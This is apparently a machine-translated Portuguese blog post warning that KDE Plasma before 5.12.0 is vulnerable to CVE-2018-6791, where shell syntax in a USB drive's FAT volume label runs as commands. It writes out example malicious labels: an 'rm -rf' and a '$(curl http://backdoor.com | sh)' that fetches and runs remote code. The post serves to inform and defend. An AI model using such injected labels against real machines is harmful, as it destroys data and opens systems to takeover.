Saiba mais!!
Se você é um usuário do KDE que ainda não foi atualizado para o Plasma 5.12, você pode querer fazê-lo em breve, ou um dos lançamentos de pontos recentes - especialmente se seu sistema for potencialmente acessível por outros para inserir dispositivos flash / memória desonesto.
As versões de Plasma 5 anteriores a versão 5.12.0 são vulneráveis ao CVE-2018-6791, que é uma vulnerabilidade para a execução de comandos arbitrários por meio do notificador de dispositivo removível.
Unidades flash ou outros dispositivos de memória USB usando um sistema de arquivos FAT se usar `` ou $ () dentro da etiqueta de volume, você poderia forçar comandos arbitrários a serem executados ao conectar a unidade.
Rogue atores ou brincalhões poderia, por exemplo, criar um volume VFAT com um rótulo de `rm -rf` ou $ (curl http://backdoor.com | sh) ou qualquer um dos potenciais potenciais numéricos e o KDE Plasma acabaria executando esses comandos quando conectado ao sistema.
É uma exploração direta, mas obviamente requer acesso físico ao sistema. O problema foi corrigido no KDE Plasma 5.12.0 e está sendo suportado em versões anteriores de Plasma. O CVE foi tornado público ontem com detalhes através deste aviso de segurança .
Fonte
Até a próxima!!
Nenhum comentário:
Postar um comentário